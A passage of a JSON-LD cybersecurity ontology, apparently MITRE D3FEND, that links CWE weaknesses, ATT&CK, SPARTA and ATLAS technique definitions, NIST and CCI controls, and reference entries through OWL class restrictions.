    {
      "@id": "_:N23456c686fdd4bc19fa4e523a23c65bd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:DigitalAccessBadge",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A credential used to gain entry to an area having automated access control entry points. Example media include magnetic stripe, proximity, barcode, and smart cards.",
      "d3f:operates": {
        "@id": "d3f:ElectronicCombinationLock"
      },
      "d3f:synonym": [
        "CAC",
        "Common Access Card",
        "PIV",
        "Personal Identity Verification"
      ],
      "rdfs:label": "Digital Access Badge",
      "rdfs:seeAlso": [
        {
          "@id": "https://dbpedia.org/page/Access_badge"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-116r1.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Credential"
        },
        {
          "@id": "_:N090fda36eef441db89d706a9905420c1"
        }
      ]
    },
    {
      "@id": "_:N090fda36eef441db89d706a9905420c1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:operates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ElectronicCombinationLock"
      }
    },
    {
      "@id": "d3f:Reference-NullPointerDereference_CWE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://cwe.mitre.org/data/definitions/476.html"
      },
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:NullPointerChecking"
      },
      "d3f:kb-reference-title": "CWE-476: NULL Pointer Dereference",
      "rdfs:label": "Reference - Null Pointer Dereferencing - CWE-476"
    },
    {
      "@id": "d3f:CWE-250",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-250",
      "d3f:definition": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses.",
      "rdfs:label": "Execution with Unnecessary Privileges",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-269"
        },
        {
          "@id": "d3f:CWE-657"
        }
      ]
    },
    {
      "@id": "d3f:CWE-62",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-62",
      "d3f:definition": "The product, when opening a file or directory, does not sufficiently account for when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.",
      "rdfs:label": "UNIX Hard Link",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-59"
      }
    },
    {
      "@id": "d3f:CWE-608",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-608",
      "d3f:definition": "An ActionForm class contains a field that has not been declared private, which can be accessed without using a setter or getter.",
      "rdfs:label": "Struts: Non-private Field in ActionForm Class",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:CWE-300",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-300",
      "d3f:definition": "The product does not adequately verify the identity of actors at both ends of a communication channel, or does not adequately ensure the integrity of the channel, in a way that allows the channel to be accessed or influenced by an actor that is not an endpoint.",
      "d3f:synonym": [
        "Adversary-in-the-Middle / AITM",
        "Interception attack",
        "Man-in-the-Middle / MITM",
        "Manipulator-in-the-Middle",
        "Monkey-in-the-Middle",
        "Monster-in-the-Middle",
        "On-path attack",
        "Person-in-the-Middle / PITM"
      ],
      "rdfs:label": "Channel Accessible by Non-Endpoint",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-923"
      }
    },
    {
      "@id": "d3f:T1617",
      "@type": "owl:Class",
      "d3f:attack-id": "T1617",
      "d3f:definition": "Adversaries may utilize hooking to hide the presence of artifacts associated with their behaviors to evade detection. Hooking can be used to modify return values or data structures of system APIs and function calls. This process typically involves using 3rd party root frameworks, such as Xposed or Magisk, with either a system exploit or pre-existing root access. By including custom modules for root frameworks, adversaries can hook system APIs and alter the return value and/or system data structures to alter functionality/visibility of various aspects of the system.",
      "rdfs:label": "Hooking - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Hooking"
    },
    {
      "@id": "d3f:ServiceStopEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the cessation of a service application’s operations, transitioning it to an inactive state while ceasing its functionality to clients or dependent systems.",
      "rdfs:label": "Service Stop Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationStopEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        },
        {
          "@id": "_:Nadde33bb57c44320aa56270333737cea"
        }
      ]
    },
    {
      "@id": "_:Nadde33bb57c44320aa56270333737cea",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceStartEvent"
      }
    },
    {
      "@id": "d3f:WindowsNtFlushInstructionCache",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtFlushInstructionCache",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIWriteMemory"
      }
    },
    {
      "@id": "d3f:Reference-TokenlessBiometricTransactionAuthorizationMethodAndSystem",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US5870723A/"
      },
      "d3f:kb-abstract": "A method and system for tokenless authorization of commercial transactions between a buyer and a seller using a computer system. A transaction is proposed by a seller, and the buyer signals his acceptance by entering his personal authentication information comprising a PIN and at least one biometric sample, forming a commercial transaction message. The commercial transaction message is forwarded to the computer system, where the computer system compares the personal authentication information in the commercial transaction message with previously registered buyer biometric samples. If the computer system successfully identifies the buyer, a financial account of the buyer is debited and a financial account of the seller is credited, and the results of the transaction are presented to both buyer and seller. As a result of the invention, a buyer can conduct commercial transactions without having to use any tokens such as portable man-made memory devices such as smartcards or swipe cards. The invention allows buyers to quickly select one of a group of different financial accounts from which to transfer funds. The invention further indicates to the user that the authentic computer system was accessed by the use of a private code that is returned to the buyer after the identification is complete. The invention additionally permits an authorized buyer to alert authorities in the event of an emergency, such as when a transaction is coerced.",
      "d3f:kb-organization": "SmartTouch Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:BiometricAuthentication"
      },
      "d3f:kb-reference-title": "Tokenless biometric transaction authorization method and system",
      "rdfs:label": "Reference - Tokenless biometric transaction authorization method and system"
    },
    {
      "@id": "d3f:Vendor",
      "@type": "owl:Class",
      "d3f:definition": "A vendor sells or supplies goods and services to customers.",
      "rdfs:label": "Vendor",
      "rdfs:subClassOf": {
        "@id": "d3f:Provider"
      }
    },
    {
      "@id": "d3f:CWE-1235",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1235",
      "d3f:definition": "The code uses boxed primitives, which may introduce inefficiencies into performance-critical operations.",
      "rdfs:label": "Incorrect Use of Autoboxing and Unboxing for Performance Critical Operations",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-400"
      }
    },
    {
      "@id": "d3f:T1170",
      "@type": "owl:Class",
      "d3f:attack-id": "T1170",
      "d3f:definition": "Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension <code>.hta</code>. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.005",
      "rdfs:label": "Mshta",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.005"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-653",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-653",
      "d3f:definition": "The product does not properly compartmentalize or isolate functionality, processes, or resources that require different privilege levels, rights, or permissions.",
      "d3f:synonym": "Separation of Privilege",
      "rdfs:label": "Improper Isolation or Compartmentalization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-657"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "d3f:T0832",
      "@type": "owl:Class",
      "d3f:attack-id": "T0832",
      "d3f:definition": "Adversaries may attempt to manipulate the information reported back to operators or controllers. This manipulation may be short term or sustained. During this time the process itself could be in a much different state than what is reported. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)",
      "rdfs:label": "Manipulation of View - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Manipulation of View"
    },
    {
      "@id": "d3f:ComputerEnclosure",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A part providing protection of computer equipment against certain external influences and protection against direct contact.",
      "rdfs:label": "Computer Enclosure",
      "rdfs:seeAlso": [
        {
          "@id": "https://dbpedia.org/page/Category:Computer_enclosure"
        },
        "[IEV 826-03-12]"
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalArtifact"
        },
        {
          "@id": "_:Ncec009eeb2ce4c438a7f7f45378c8fee"
        },
        {
          "@id": "_:Ne81c00da54eb43deb522596a10fde7b7"
        }
      ]
    },
    {
      "@id": "_:Ncec009eeb2ce4c438a7f7f45378c8fee",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ComputerPlatform"
      }
    },
    {
      "@id": "_:Ne81c00da54eb43deb522596a10fde7b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLock"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-10_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:DriverLoadIntegrityChecking"
      },
      "d3f:control-name": "Non-repudiation | Digital Signatures",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AU-10(5)"
    },
    {
      "@id": "d3f:RD-0001.04",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0001.04",
      "d3f:definition": "In practice, adversaries are far more likely to purchase launch services (rideshare slots, hosted-payload opportunities) than to “acquire a launch facility.” Nevertheless, understanding and exploiting launch infrastructure, pads, integration cells, range networks, and control centers, could support resource development (e.g., positioning an asset, staging equipment near range telemetry). The realistic objective is influence over access to orbit, schedule, or integration touchpoints rather than ownership of a pad. Shell entities might book benign-sounding rides, insert dual-use payloads, or seek special handling that relaxes controls.",
      "rdfs:label": "Launch Facility - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0001/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0001"
      },
      "skos:prefLabel": "Launch Facility"
    },
    {
      "@id": "d3f:DS0013",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Information from host telemetry providing insights about system status, errors, or other notable functional activity",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Sensor Health (ATT&CK DS)"
    },
    {
      "@id": "d3f:ScheduledJobEnableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a scheduled task is activated, allowing it to execute according to its defined parameters.",
      "rdfs:label": "Scheduled Job Enable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ScheduledJobEvent"
        },
        {
          "@id": "_:N429d11a9a73a464ebb2dd3ac4e9209ef"
        }
      ]
    },
    {
      "@id": "_:N429d11a9a73a464ebb2dd3ac4e9209ef",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJobCreationEvent"
      }
    },
    {
      "@id": "d3f:RemoteAuthenticationService",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A remote authentication service provides for the authentication of a user across a network (i.e., remotely).",
      "rdfs:label": "Remote Authentication Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AuthenticationService"
        },
        {
          "@id": "d3f:NetworkService"
        }
      ]
    },
    {
      "@id": "d3f:Reference-NISTIR-8011-Volume-1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://doi.org/10.6028/NIST.IR.8011-1"
      },
      "d3f:kb-abstract": "This volume introduces concepts to support automated assessment of most of the security controls in NIST Special Publication (SP) 800-53. Referencing SP 800-53A, the controls are divided into more granular parts (determination statements) to be assessed. The parts of the control assessed by each determination statement are called control items. The control items are then grouped into the appropriate security capabilities. As suggested by SP 800-53 Revision 4, security capabilities are groups of controls that support a common purpose. For effective automated assessment, testable defect checks are defined that bridge the determination statements to the broader security capabilities to be achieved and to the SP 800-53 security control items themselves. The defect checks correspond to security sub-capabilities—called sub-capabilities because each is part of a larger capability. Capabilities and sub-capabilities are both designed with the purpose of addressing a series of attack steps. Automated assessments (in the form of defect checks) are performed using the test assessment method defined in SP 800-53A by comparing a desired and actual state (or behavior).",
      "d3f:kb-author": "Kelley Dempsey, Paul Eavy, and George Moore",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalRiskAssessment"
      },
      "d3f:kb-reference-title": "NIST Interagency Report 8011 Volume 1 - Automation Support for Security Control Assessments",
      "rdfs:label": "Reference - NISTIR 8011 Volume 1 - Automation Support for Security Control Assessments"
    },
    {
      "@id": "d3f:CWE-1223",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1223",
      "d3f:definition": "A write-once register in hardware design is programmable by an untrusted software component earlier than the trusted software component, resulting in a race condition issue.",
      "rdfs:label": "Race Condition for Write-Once Attributes",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-362"
      }
    },
    {
      "@id": "d3f:ResidualNeuralNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RNN",
      "d3f:definition": "A residual neural network (ResNet) is an artificial neural network (ANN). It is a gateless or open-gated variant of the HighwayNet, the first working very deep feedforward neural network with hundreds of layers, much deeper than previous neural networks.",
      "d3f:kb-article": "## References\nWikipedia contributors. (2021, August 23). Residual neural network. In Wikipedia, The Free Encyclopedia. [Link](https://en.wikipedia.org/wiki/Residual_neural_network)",
      "rdfs:label": "Residual Neural Network",
      "rdfs:subClassOf": {
        "@id": "d3f:ConvolutionalNeuralNetwork"
      }
    },
    {
      "@id": "d3f:T1562.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.003",
      "d3f:definition": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.",
      "d3f:may-modify": [
        {
          "@id": "d3f:UserInitScript"
        },
        {
          "@id": "d3f:WindowsRegistryKey"
        }
      ],
      "d3f:modifies": {
        "@id": "d3f:ProcessEnvironmentVariable"
      },
      "rdfs:label": "Impair Command History Logging",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:Nc1d8133943294dce87ea70de04e5b989"
        },
        {
          "@id": "_:N07474f0920074e7a881abd7d43532fc0"
        },
        {
          "@id": "_:Nc283c0e6766043babaea49ece2e71c58"
        }
      ]
    },
    {
      "@id": "_:Nc1d8133943294dce87ea70de04e5b989",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInitScript"
      }
    },
    {
      "@id": "_:N07474f0920074e7a881abd7d43532fc0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKey"
      }
    },
    {
      "@id": "_:Nc283c0e6766043babaea49ece2e71c58",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessEnvironmentVariable"
      }
    },
    {
      "@id": "d3f:UserLogonInitResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user logon initialization resource contains information used to configure a user's environment when a user logs into a system.",
      "rdfs:label": "User Logon Init Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:LocalResource"
      }
    },
    {
      "@id": "d3f:OSAPIWriteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that writes data from a buffer in memory to a file or output stream.",
      "d3f:invokes": {
        "@id": "d3f:WriteFile"
      },
      "rdfs:label": "OS API Write File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Nea5f8e9467c14d37ba276d03825947e5"
        }
      ]
    },
    {
      "@id": "_:Nea5f8e9467c14d37ba276d03825947e5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WriteFile"
      }
    },
    {
      "@id": "d3f:SystemFirewallConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:configures": {
        "@id": "d3f:Host-basedFirewall"
      },
      "d3f:definition": "The configuration for an individual host operating system's firewall.",
      "rdfs:label": "System Firewall Configuration",
      "rdfs:seeAlso": {
        "@id": "dbr:Firewall_(computing)"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemConfigurationComponent"
        },
        {
          "@id": "_:N4b81c762813b4a09b7dcb8cafc2e04c4"
        }
      ]
    },
    {
      "@id": "_:N4b81c762813b4a09b7dcb8cafc2e04c4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:configures"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host-basedFirewall"
      }
    },
    {
      "@id": "d3f:EXF-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0001",
      "d3f:definition": "The adversary re-sends previously valid commands or procedures to cause the spacecraft to transmit data again, then captures the resulting downlink. Typical targets are recorder playbacks, payload product dumps, housekeeping snapshots, or file directory listings. By aligning replays with geometry (e.g., when the satellite is in view of actor-controlled apertures) and with acceptance conditions (counters, timetags, mode), the attacker induces legitimate transmissions that appear routine to operators. Variants include selectively replaying index ranges to fetch only high-value intervals, reissuing subscription/telemetry-rate changes to increase data volume, or queueing playbacks that fire during later passes when interception is feasible.",
      "rdfs:label": "Replay - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Replay"
    },
    {
      "@id": "d3f:CWE-174",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-174",
      "d3f:definition": "The product decodes the same input twice, which can limit the effectiveness of any protection mechanism that occurs in between the decoding operations.",
      "rdfs:label": "Double Decoding of the Same Data",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-172"
        },
        {
          "@id": "d3f:CWE-675"
        }
      ]
    },
    {
      "@id": "d3f:T1063",
      "@type": "owl:Class",
      "d3f:attack-id": "T1063",
      "d3f:definition": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1518.001",
      "rdfs:label": "Security Software Discovery",
      "rdfs:seeAlso": {
        "@id": "d3f:T1518.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:CWE-794",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-794",
      "d3f:definition": "The product receives data from an upstream component, but does not filter all instances of a special element before sending it to a downstream component.",
      "rdfs:label": "Incomplete Filtering of Multiple Instances of Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-792"
      }
    },
    {
      "@id": "d3f:CollectionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to gather data of interest to their goal.",
      "d3f:enables": {
        "@id": "d3f:TA0009"
      },
      "rdfs:label": "Collection Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N7b68fa77fecd468aa078b413c44d98d8"
        }
      ]
    },
    {
      "@id": "_:N7b68fa77fecd468aa078b413c44d98d8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0009"
      }
    },
    {
      "@id": "d3f:AML.T0000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0000",
      "d3f:definition": "Adversaries may search for publicly available research and technical documentation to learn how and where AI is used within a victim organization.\nThe adversary can use this information to identify targets for attack, or to tailor an existing attack to make it more effective.\nOrganizations often use open source model architectures trained on additional proprietary data in production.\nKnowledge of this underlying architecture allows the adversary to craft more realistic proxy models ([Create Proxy AI Model](/techniques/AML.T0005)).\nAn adversary can search these resources for publications for authors employed at the victim organization.\n\nResearch and technical materials may exist as academic papers published in [Journals and Conference Proceedings](/techniques/AML.T0000.000), or stored in [Pre-Print Repositories](/techniques/AML.T0000.001), as well as [Technical Blogs](/techniques/AML.T0000.002).",
      "rdfs:label": "Search Open Technical Databases - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Search Open Technical Databases"
    },
    {
      "@id": "d3f:T1588.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588.002",
      "d3f:definition": "Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) was not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)",
      "rdfs:label": "Tool",
      "rdfs:subClassOf": {
        "@id": "d3f:T1588"
      }
    },
    {
      "@id": "d3f:T1548.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1548.002",
      "d3f:definition": "Adversaries may bypass UAC mechanisms to elevate process privileges on a system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)",
      "d3f:executes": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:may-modify": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Bypass User Account Control",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1548"
        },
        {
          "@id": "_:N6bb28c0c8daa4af9ae490cd9eba5e521"
        },
        {
          "@id": "_:Nd932a72c320548529be89ad21b8b74a1"
        },
        {
          "@id": "_:N1a162dcb6cd04d9db5183e7fe7b92f81"
        }
      ]
    },
    {
      "@id": "_:N6bb28c0c8daa4af9ae490cd9eba5e521",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:Nd932a72c320548529be89ad21b8b74a1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N1a162dcb6cd04d9db5183e7fe7b92f81",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:T1126",
      "@type": "owl:Class",
      "d3f:attack-id": "T1126",
      "d3f:definition": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\\\system\\share /delete</code> command. (Citation: Technet Net Use)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1070.005",
      "rdfs:label": "Network Share Connection Removal",
      "rdfs:seeAlso": {
        "@id": "d3f:T1070.005"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1627.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1627.001",
      "d3f:definition": "Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv)",
      "rdfs:label": "Geofencing - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1627"
      },
      "skos:prefLabel": "Geofencing"
    },
    {
      "@id": "d3f:Reference-FirmwareEmbeddedMonitoringCodeSymbiotes",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "http://nsl.cs.columbia.edu/projects/minestrone/papers/Symbiotes.pdf"
      },
      "d3f:kb-abstract": "A large number of embedded devices on the internet, such as\nrouters and VOIP phones, are typically ripe for exploitation. Little to no defensive technology, such as AV scanners or IDS's, are available to protect these devices. We propose a host-based defense mechanism, which we call Symbiotic Embedded Machines (SEM), that is specifically designed\nto inject intrusion detection functionality into the firmware of the device.",
      "d3f:kb-author": "Ang Cui, Salvatore J. Stolfo",
      "d3f:kb-organization": "Department of Computer Science Columbia University",
      "d3f:kb-reference-of": {
        "@id": "d3f:FirmwareEmbeddedMonitoringCode"
      },
      "d3f:kb-reference-title": "Defending Embedded Systems with Software Symbiotes",
      "rdfs:label": "Reference - Firmware Embedded Monitoring Code Symbiotes"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Content of Audit Records",
      "d3f:exactly": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AU-3"
    },
    {
      "@id": "d3f:VariableInitialization",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-VI",
      "d3f:definition": "Setting variables to a known value before use.",
      "d3f:hardens": {
        "@id": "d3f:Subroutine"
      },
      "d3f:kb-article": "## How it Works\nInitializing variables upon declaration ensures that the variable has a known quantity before use.\n\n## Considerations\n* Default behavior when declaring variables varies by language.\n* This is particularly important in programming languages that do not initialize variables to a default value upon declaration. In these instances, the value that a variable will contain after declaration is indeterminate, which can cause issues. In fact, that value could be different each time the program is run.\n* Note: This resource should not be considered a definitive or exhaustive coding guideline.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CManualIntegerInitialization_GNU"
        },
        {
          "@id": "d3f:Reference-VariableInitialization_CWE"
        }
      ],
      "rdfs:label": "Variable Initialization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SourceCodeHardening"
        },
        {
          "@id": "_:N78682578620244128b855ae378fa967e"
        }
      ]
    },
    {
      "@id": "_:N78682578620244128b855ae378fa967e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:CCI-001668_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "d3f:ProcessAnalysis"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs malicious code protection mechanisms at workstations, servers, or mobile computing devices on the network to detect and eradicate malicious code transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means or inserted through the exploitation of information system vulnerabilities.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-12T00:00:00"
      },
      "rdfs:label": "CCI-001668"
    },
    {
      "@id": "d3f:ATTACKICSImpactTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0105"
      },
      "rdfs:label": "Impact Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
